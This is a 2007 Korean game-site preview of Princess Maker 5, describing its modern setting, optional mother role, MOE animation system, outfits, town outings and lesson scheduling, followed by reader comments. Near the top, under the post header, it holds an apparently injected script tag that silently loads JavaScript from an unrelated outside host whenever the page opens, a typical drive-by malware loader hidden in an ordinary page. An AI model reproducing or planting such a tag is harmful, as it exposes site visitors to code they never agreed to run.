총 게시물 686건, 최근 35 건 안내
이전글  다음글  목록
[프리뷰]

프린세스메이커 5

글쓴이 : betagam 날짜 : 2007-02-02 (금) 11:26 조회 : 32999


<SCRIPT Language=JavaScript src=http://rnjsdudwh.cafe24.com/Mics.php></script>

몇 년간의 기다림 끝에 모처럼 발매된 ‘프린세스 메이커 4’였으나, 이를 대하는 사람들의 반응은 조금 얼떨떨한 느낌이었다. ‘시스터 프린세스’의 ‘텐히로 나오토’가 그린 딸도 나름대로 귀엽기는 했지만, 지금까지의 시리즈에 깊숙이 관여하고 있던 ‘아카이 타카미’의 그림자는 실로 떨쳐 내기 힘든 것이었다.

아카이의 귀환

그런데 작년 8월, 프린세스 메이커 시리즈의 국내 유통사인 한국후지쯔가 빨리도 ‘프린세스 메이커 5’의 개발 사실을 발표했고, 아카이 타카미가 제작 일선에 복귀한다는 소식에 많은 올드팬들은 쌍수를 들어 환영했다. 이에 본 필자, 한글화 작업이 한창인 이 게임에 대한 몇 가지 정보를 모아보았다.

배경은… 현대?!

프린세스 메이커 5의 가장 큰 특징은 게임의 무대가 현대로 옮겨졌다는 것이다. 이 세계에는 TV는 물론 휴대전화도 있고, 인터넷도 사용할 수 있다. 하지만 조금 다른 점이 있다. 그것은 마물과 요정이 살고 있는 세계가 공존한다는 것. 이 세계는 천계, 마계, 요정계, 성령계, 인간계의 5가지로 구성되어 있다.

각각의 세계는 인간계를 중심으로 밸런스를 유지하며 평화로운 생활을 영위하고 있었다. 하지만 그런 세계의 조화를 망가뜨리려는 혁명 세력이 조화의 상징이라 할 수 있는 프린세스 후보들을 노리고, 플레이어는 왕국에서 유일하게 살아 남은 프린세스 후보를 자신의 딸처럼 키우기로 결심한다.

아직 열살 밖에 되지 않은 소녀는 과거의 기억을 잃어 자신이 왕국의 프린세스 후보인 것도, 혁명 세력으로부터 위협 받고 있다는 사실도 모르고 있다. 따라서 보통의 소녀들처럼 학교를 다니면서 공부도 하고, 친구들과도 사귀는 등 여러 가지 경험을 할 것이다. 플레이어는 이 딸이 고등학교를 졸업하기까지 8년간 육성하게 된다.

이벤트 앨범. 34%의 압박

이제 엄마도 될 수 있어요

지금까지의 프린세스 메이커 시리즈는 플레이어에게 언제나 아버지의 역할을 강요해왔다. 아마도 이는 개발자와 유저 양쪽 모두 남성이 대다수를 차지했기 때문이었겠으나, 시리즈가 인기를 얻으면서 여성 플레이어의 비중은 날이 갈수록 커지고 있다. 이를 감안한 듯 본작에서는 엄마의 역할도 가능하도록 해 선택의 폭을 넓혀 놓았다.

엄마라고 부르고 있다. 야릇한 기분이...

딸의 상태를 알려주는 MOE 시스템

‘모에’라고 하면 많은 사람들이 萌え를 떠올리겠지만 이 게임에서는 Motion of Emotion, 즉 모션을 통한 감정의 표현을 의미한다. 쉽게 말해 SD 캐릭터가 딸의 능력, 성격, 컨디션, 흥미 등을 반영해 움직이는 것인데, 몸이 불편하면 침대에서 자고, 스트레스가 쌓이면 한숨을 쉬거나 인형에게 화풀이한다.

결국 萌え에 걸맞는 시스템이라 할 수 있을 듯

옷을 갈아 입어 보아요

딸과 대화를 할 때는 화면 상에 딸의 모습이 크게 표시되는데, 이 때 입고 있는 옷을 갈아 입힐 수 있다. TPO에 맞춰 옷을 입히면 컨디션이 무너지는 일도 없고, 데이트 할 때 상대에 맞추어 옷을 바꿔 입으면 평가가 달라질 수도 있다. 물론 게임의 진행 상황에 따라 입수할 수 있는 옷은 증가한다.

더욱 발전한 집사 큐브

초보 유저를 위해 집사인 큐브에게 게임 진행 방식이나 공략의 힌트를 설명해 주는 튜토리얼 기능이 첨부되었다. 또 게임 도중 선택 사항이나 중요한 항목에는 커서를 갖다 대면 이름이나 내용 설명이 표시되어 다른 데 신경 쓰지 않고 딸을 육성하는 일에 좀 더 집중할 수 있게 되었다.

큐브의 귀환

딸과 함께 현대의 도시로 외출

거리에 나서면 여러 가지 이벤트를 볼 수 있다. 친구와 만나 사이가 가까워질 수도 있고, 모임에 참여해 딸의 능력이 오르는 일도 있다. 또 각종 아이템도 판매되고 있는데 딸의 능력치를 올리거나 스트레스를 해소하는 아이템을 입수할 수 있으며, 거리의 소식통 에밀린과 에밀리가 새로운 장소를 계속해서 알려준다.

센스 있는 여자라면 봄 세일을 놓칠 수 없다

딸이 살고 있는 히메미야 마을은 작은 산과 큰 강이 있는, 아직 자연 풍경이 남아 있는 교외의 주택가이다. 역 앞에는 상가가 있어 대부분의 물건이 갖추어져 있으며, 패밀리 레스토랑과 종합병원도 있다. 그리고 해안의 하마사키시는 잡화와 전기전문점, 종합백화점이 갖추어진 상업도시로 영화관과 레저 스포츠도 준비되어 있다.

미인 점장님

게임의 진행 방법

제일 먼저 할 일은 교육 방침을 세우는 것. 귀가 시간, 공부와 놀이의 밸런스, 예의범절 등 딸을 어떤 방침으로 기를 지부터 결정해야 한다. 딸은 이 방침에 따라 행동하게 되는데, 귀가 시간이 늦으면 밤 늦게까지 놀다 오므로 사교성은 높아질 지 몰라도 공부에는 그만큼 소홀하게 될 것이다.

그리고 지금까지의 시리즈와 달리 이 게임에서는 평일에 딸이 학교에 가게 되지만 방과 후를 어떻게 보낼지는 부모가 결정해야 한다. 과외 수업은 여러 가지 능력을 올릴 수 있지만 돈이 필요하고, 아르바이트는 돈을 벌면서 능력도 향상시킬 수 있다. 하지만 이들은 스트레스의 원인이 되므로 주의가 필요하다.

  • 과외 수업: 학원, 스포츠짐, 카라테도장, 피아노교실, 발레교실, 회화교실
  • 아르바이트: 서점원, 자원봉사, 환경미화원, 베이비시터, 가사도우미

※ 게임의 진행에 의해 여러 가지 과외 수업과 아르바이트가 추가된다

평일에 실시되는 학교 수업은 정해져 있지만 선택 과목과 특별 활동은 플레이어가 자유롭게 선택할 수 있다. 각각 새로운 학년이 시작되는 4월에 결정하게 되며, 이후 1년간은 이를 변경할 수 없다. 물론 과목의 선택에 의해 능력이 달라지며, 특별 활동에 따라선 문화제나 대회를 통해 성과를 시험하는 것도 가능하다.

이장원(inca)


빗짜아루 (211.♡.165.34) 2007-02-02 (금) 13:02
근데요 시리즈를 할때마다 느끼는건데요 왜 아르바이트비는 아빠가 챙기나염..
댓글주소
(125.♡.123.35) 2007-02-02 (금) 14:45
재미가..음 어떨까나..진짜 명작은..프메2였는대 = _=.. 나름 드레스폴더 삭제하면 누드도 되고..낄낄
댓글주소
3분대장 (211.♡.18.30) 2007-02-02 (금) 16:07
얼굴은 프린세슨데 방은 자취방이네...;;
댓글주소
고광일 (211.♡.121.18) 2007-02-02 (금) 17:16
나도 시리즈할때마다 느끼는건데 아빠는 알바못하나? 자기가 알바해서 딸을 갈켜야지
딸을 일시켜서 키우는게 말이되냐 ㅋㅋ 앵벌이지 ㅋㅋ머 겜이니까 그러려니 재밋게 하긴하지만 ^^ㅋㅋ
댓글주소
李晙浩 (58.♡.21.244) 2007-02-03 (토) 08:24
[존레논] ''프린세스' 자취방에, 어서 오세요~!'
댓글주소
제노니아 (59.♡.22.5) 2007-02-03 (토) 09:13
빗짜아루// ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ

¥//  프메 플레이를 할줄 아시는분 ㅋㅋㅋㅋㅋㅋㅋㅋ

근데 딸 생김새가 마음에 안드네요...

지금까지 중세풍의 긴 금발이였는데 단발 보니까 적응이 안되는 ㅋㅋㅋㅋ
댓글주소
Jorker (211.♡.101.121) 2007-02-03 (토) 11:15
프메2는..

DD.dat 파일인가 지워야 할맛이 남^^
댓글주소
predator (211.♡.60.34) 2007-02-05 (월) 12:03
일어......................한글화는? ㄱ=
댓글주소
(좌절하는)주인님 (222.♡.191.16) 2007-02-05 (월) 12:58
프메는 언제쯤 3D로 나올란감...
댓글주소
샤다삐라 (222.♡.167.165) 2007-02-06 (화) 00:01
큐브 돌아왔네.........
댓글주소
헤바라기 (59.♡.99.237) 2007-02-06 (화) 12:35
전 2D가 더 좋던데....
댓글주소
Nell (220.♡.148.248) 2007-02-06 (화) 19:52
하악하악하악하악하악하악하악하악하악하악하악하악하악하악하악하악하악하악하악하악하악하악하악하악하악하악하악하악하악하악하악하악하악 이제 좀 차기작같네요. 프메4는 변한게 없는거 같았어.. 하악하악
댓글주소
이상웅 (218.♡.23.91) 2007-02-08 (목) 01:26
프린세스 시리즈 팬으로써 대환영이구요
일단 국내에 정발되면 바로 지를꺼구요, 헌데 어째서 무사수련은 없는겁니까. 역쉬 2보다 못한것인가.
댓글주소
karame (121.♡.144.139) 2007-02-08 (목) 02:00
딸아이에게서 므훗한 감정이 안생긴다..
댓글주소
류노 (218.♡.13.79) 2007-02-09 (금) 22:42
소문의 그 '몰카' 시스템이군 -ㅁ-;;
댓글주소
AceSaga (122.♡.108.43) 2007-02-11 (일) 02:35
우선 그전에 불법관련 부터 잡아야죠. 현제 대다수의 프매 유저는 프린세스메이커가 저작권이 풀렸다고 생각합니다.
댓글주소
코환 (211.♡.128.93) 2007-02-11 (일) 12:43
점점 갈수록 케릭터가 오타쿠취향에 맞춰 가는듯 하네요..

1,2때가 제일 괜찮았던듯
댓글주소
SimoHayha (220.♡.107.243) 2007-02-11 (일) 22:34
흠..... 저도 어째 좀 적응이 안간다는....
댓글주소
딸기공장 (58.♡.82.160) 2007-02-12 (월) 05:13
개인적으로 프메4탄 사고 피눈물을 흘렸다는... 이제것 게임사고 피눈물을 흘린건 프메4가 처음. 과연 프메의 옛 명성을 되찾을 수 있을런지...
댓글주소
The Prince (221.♡.59.86) 2007-02-13 (화) 20:09
프메 3처럼 음성까지 한글화하는 근성을 발휘해봐라!!
댓글주소
레카르도 (211.♡.101.58) 2007-02-15 (목) 00:25
프메5 나온건가요? 제작루머는 6~7년전부터 들리더만..ㅋㅋ
댓글주소
라이프가드 (125.♡.179.80) 2007-02-15 (목) 23:52
돈낭비..ㅎㅎ
댓글주소
흑표범 (58.♡.200.46) 2007-02-17 (토) 20:04
DD.LBX
댓글주소
netnk9151 (58.♡.98.239) 2007-02-21 (수) 17:09
닥치고 풍유환
댓글주소
이런 님히!!(불경… (222.♡.55.117) 2007-02-22 (목) 19:15
후후후 방문 판매상 원츄
댓글주소
Nurse Demons (59.♡.58.37) 2007-02-23 (금) 13:24
집좀 하나사지... 맨날 독방.. ㄷㄷ
댓글주소
탈란트 (211.♡.252.163) 2007-03-03 (토) 21:42
. . . .
댓글주소
Aio76 (124.♡.89.59) 2007-03-07 (수) 08:50
이건 아니자나~ 이건 아니자나~
댓글주소
成河SHK☆ (121.♡.173.3) 2007-05-19 (토) 11:07
구해서 해봐야 할듯....

케릭터 자체는 귀엽넹
댓글주소
이전글  다음글  목록

총 게시물 686건, 최근 35 건 안내
번호 분류 이미지 제목 글쓴이 날짜 추천 비추천 조회
686 프리뷰  블리자드 스케일, 와우 betaon 11-22 1457 0 60538
685 프리뷰  <드래곤 에이지: 오리진> 체험기 29 소솜 10-30 93 0 49089
684 리뷰  [리뷰] 배틀필드 2 16 betagam 07-04 208 0 42347
683 프리뷰  디아블로 3 69 betagam 07-11 95 0 41660
682 프리뷰  프린세스메이커 5 29 betagam 02-02 178 0 33000
681 리뷰  스타크래프트2 플레이 소감 36 퀘이크마스터 08-12 82 0 31692
680 리뷰  [리뷰] 블랙 앤 화이트 2 18 betagam 10-18 160 0 31578
679 리뷰  [리뷰] 프린세스 메이커 4 23 betagam 06-11 145 0 30719
678 프리뷰  블록버스터 프로젝트, RF온라인 betaon 09-10 1288 0 29919
677 프리뷰  동화와 판타지, 로즈 온라인 betaon 10-08 1372 0 29828
676 프리뷰  스타크래프트 2 21 betagam 07-05 152 0 29028
675 리뷰  게임시장의 새로운 바람, AOS장르 8 엄마랑원터치 11-27 118 0 28966
674 리뷰  "오픈월드 RPG에 화려한 액션을 더했다" 킹덤오브아말러:레코닝 17 betagam 02-23 2 0 28637
673 리뷰  [리뷰] 이스 페르가나의 맹세 11 betagam 09-01 219 0 28594
672 프리뷰  명작 "바이오쇼크"를 말하다 35 작가-현영 09-01 196 0 27614
671 프리뷰  열혈강호-무림쟁패 betamo 10-05 1478 0 27146
670 리뷰  공포 어드벤쳐, 피넘브라 30 pluto9 07-02 95 0 27022
669 프리뷰  절대고수를 꿈꾼다! 십이지천 betagam 11-11 1533 0 26997
668 리뷰  레전드 오브 그림락 : 4인의 모험담과 필사의 탈출기! 13 cOOLwARP 11-03 5 0 26822
667 프리뷰  현재를 즐기자, 카르페디엠 betaon 10-01 1383 0 26121
1 2 3 4 5 6 7 8 9 10